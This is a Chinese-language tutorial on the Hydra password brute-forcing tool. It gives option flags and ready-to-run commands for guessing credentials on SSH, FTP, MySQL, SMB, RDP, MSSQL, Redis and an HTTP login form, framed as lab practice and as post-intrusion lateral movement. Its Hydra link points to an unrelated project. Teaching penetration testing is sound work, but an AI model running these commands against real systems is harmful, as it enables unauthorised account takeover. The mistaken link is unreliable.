hydra基础使用

1、hydra/九头蛇简介

hydra 是一个端口穷举服务器的工具。

网址：https://github.com/facebookresearch/hydra 或者 https://hydra.cc/

kali里面就有

它支持的协议很多

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post}
http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s]
ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener
oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap
rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak
telnet[s] vmauthd vnc xmpp

使用：

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]`

使用参数说明

-R：继续从上一次进度接着破解
-S：大写，采用 SSL 链接
-s <PORT>：小写，可通过这个参数指定非默认端口
-l <LOGIN>：指定破解的用户，对特定用户破解
-L <FILE>：指定用户名字典
-p <PASS>：小写，指定密码破解，少用，一般是采用密码字典
-P <FILE>：大写，指定密码字典
-e <ns>：可选选项，n：空密码试探，s：使用指定用户和密码试探
-C <FILE>：使用冒号分割格式，例如“登录名:密码”来代替-L/-P 参数
-M <FILE>：指定目标列表文件一行一条
-o <FILE>：指定结果输出文件
-f：在使用-M 参数以后，找到第一对登录名或者密码的时候中止破解
-t <TASKS>：同时运行的线程数，默认为 16
-w <TIME>：设置最大超时的时间，单位秒，默认是 30s
-v / -V：显示详细过程
server：目标 ip
service：指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp 等等
OPT可选项

2、使用

例子：

hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh

可以在渗透进入内网了之后，在内网里面访问其他服务或者服务器使用。

下面都是靶机测试的截图，仅供参考学习。

2.1 穷举ssh服务

ssh服务：专门为远程登录会话和其他网络服务(例如:rsync,ansible)提供的安全性协议

hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh -o ssh.txt -f

"""
-L 用户字典文件 
-P 密码字典文件
-t 线程数 
-vV 详细信息 
-e ns 使用空口令使用指定用户和密码试探 
192.168.1.104 你要穷举的 ip 
ssh 是服务
-o 保存文件
-f 如果找到马上中断扫描
"""

ssh服务的两种连接写法

1. ssh://192.168.1.104
2. 192.168.1.104 ssh

查看SSH服务靶机的端口是否打开

Nmap -P 22 192.168.3.12

端口开放，可以进行爆破

hydra -l root -P /home/kali/top100password.txt -e ns -vV -t 1 -f 192.168.3.12 ssh

2.2 穷举FTP服务

FTP服务：FTP是一种上传和下载用的软件。用户可以通过它把自己的PC机与运行FTP协议的服务器相连，访问服务器上的程序和信息。

hydra -l c5moon -P /home/kali/top100password.txt -e ns -vV 192.168.3.15 ftp

2.3 穷举MYSQL服务

MySQL：数据库

hydra -l root -P /home/kali/top100password.txt -e ns -vV 192.168.3.11 mysql

2.4 穷举smb服务

smb服务：用于在计算机间共享文件、打印机、串口等，电脑上的网上邻居由它实现。

hydra -l administrator -P /home/kali/top100password.txt -e ns -vV 192.168.3.11 smb -o smb.txt

还可以批量穷举

hydra -L user.txt -P /home/kali/top100password.txt -M ip.txt smb  -o smb.txt

2.5 穷举rdp服务

rdp服务：远程桌面

hydra -L user.txt -P /home/kali/top100password.txt -M ip.txt rdp  -o rdp.txt

2.5 穷举HTTP服务

hydra -l admin -P top100password.txt -vV -f www.c1moon.com http-post-form "/admin/index.php:user=^USER^&ps=^PASS^&action=login:login-error"

2.6 穷举mssql服务

hydra -l sa -P /home/kali/top100password.txt -e ns -vV 192.168.3.11 mssql

2.6 穷举redis服务

hydra -P /home/kali/top100password.txt -e ns -vV  -f 192.168.3.11 redis

3、xhydra 可视化

在kali里终端输入xhydra就可以打开可视化界面，进行可视化的操作。